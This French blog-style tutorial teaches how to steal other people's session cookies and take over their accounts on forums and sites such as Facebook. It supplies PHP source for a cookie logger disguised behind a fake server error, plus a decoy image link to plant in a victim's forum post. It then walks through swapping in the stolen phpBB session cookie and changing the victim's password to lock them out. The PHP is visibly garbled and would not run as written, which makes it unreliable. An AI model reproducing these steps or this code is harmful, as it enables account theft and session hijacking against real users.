HACKER N'IMPORTE QUEL COMPTE AVEC COOKIE LOGGER

Pour être précis, dans ce billet, je compte vous montrer comment onutilise un cookieLogger afin d’enregistrer les cookies qui nous permettrons d’avoir accès à divers types de comptes

Cookie c’est quoi ?

Les cookies en informatique ne sont pas des biscuits comme la traduction
littérale nous force à croire, mais un témoin de connexion souvent utilisé pour stocker une information sur l’utilisateur, un site ou un contenu du panier d’achat électronique. Ainsi grace aux cookies vous pouvez pirater le compte d’une personne, changer son mdp et cela est valable pour tous les sites Google, Yahoo, Orkut, Facebook, Flickr, etc

C’est quoi un CookieLogger ?

Contenant dejà 2 mots attachés (cookie&logger), celui est simplement un script qui permet d’obtenir accès(log), donc voler les cookies pour les
stocker dans un fichier journal vialequel vous pouvez les lire sans difficulté.
Ok ça deviens excitant je sais, car vous aller faire votre propre enregistreur de cookie aujourd’hui etc’est un truc de oufff !!!!

Voici ce qu’il faut faire :
1-De puis le lien http://crocko.com/1702516956.html , enregistrez le fichier bloc-note et baptisez-le Fun.gif
2. Copiez le script suivant dans un fichier Bloc-notes et enregistrez le sous le nom de cookielogger.php

<? Php
$ Filename = "logfile.txt";
if (isset ($ _GET ["cookie"]))
{
if ($ handle = fopen ($ fichier, 'a'))
{
echo "Erreur temporaire du serveur,
Désolé pour le désagrément.";
exit;
}
else
{
if (fwrite ($ handle, "\ r \ n". $ _GET
["cookie"]) === FALSE)
{
echo " Erreur temporaire du serveur,
Désolé pour le désagrément.";
exit;
}
}
echo " Erreur temporaire du serveur,
Désolé pour le désagrément.";
fclose ($ handle);
exit;
}
echo " Erreur temporaire du serveur,
Désolé pour le désagrément.";
exit;
>
3. Créez un nouveau fichier bloc-notes en enregistrez-le sous le nom de logfile.txt

4. Uploadez vos 3 fichiers sur le serveur :

• cookielogger.php -> http://www.yoursite.com/cookielogger.php 
• logfile.txt -> http://www.yoursite.com/logfile.txt  (chmod 777)
• fun.gif -> http://www.yoursite.com/fun.gif 

Si vous n'avez pas de site Web, vous pouvez http://0fees.net  pour
obtenir un site Web gratuit qui a le support de PHP
5. Rendez-vous sur le forum de votre victime et insérez ce code dans la signature ou le post http://crocko.com/1702516964.html

<a href="www.votre_site.com/fun.gif"><img style="cursor: pointer;
width: 116px; height: 116px;"
src=" nesite.com/jpg" /></a>

6. Lorsque votre victime voit le post,et l'image que vous avez uploadé et
clique, elle remarque une erreur temporaire et vous (le Pirate) obtiendrez son cookie dans log.txt, sous la forme suivante :

phpbb2mysql_data=a%3A2%3A%7Bs%
3A11%3A%22autologinid%22%3Bs%3A0%
3A%22%22%3Bs%3A6%3A%22userid%
22%3Bi%3A-1%3B%7D;phpbb2mysql_
sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

(youppppppiiii on a réalisé 80% du job
figurez-vous)

7. Pour obtenir l'accès au compte de la
victime, il suffit de remplacer vos
cookies par ceux de votre victime,
pour cela vous pouvez utiliser Cookie
Editor. La chaîne avant "=" est le nom
du cookie et la chaîne après "=" est sa
valeur, donc vous n’avez juste qu’à
Modifiez les valeurs des cookies dans
l'éditeur de cookie.
8. Grrrr !!! essayez de voir le site web
dont le compte vient d’être piraté,
vous verrez que vous êtes connecté
en tant que victime et ainsi vous
pouvez modifier les informations du
compte à votre guise
Remarques : Assurez-vous que de
l'étape 6 à 8, la victime soit en ligne
parce que vous êtes en train de
détourner sa session (Hijacking),
donc, si la victime clique sur
Déconnexion vous serez également
déconnecter automatiquement, mais
une fois que vous avez changé le mot
de passe, vous pouvez à nouveau vous
connecter avec le nouveau mot de
passe et la victime ne sera pas en
mesure d'ouvrir sa session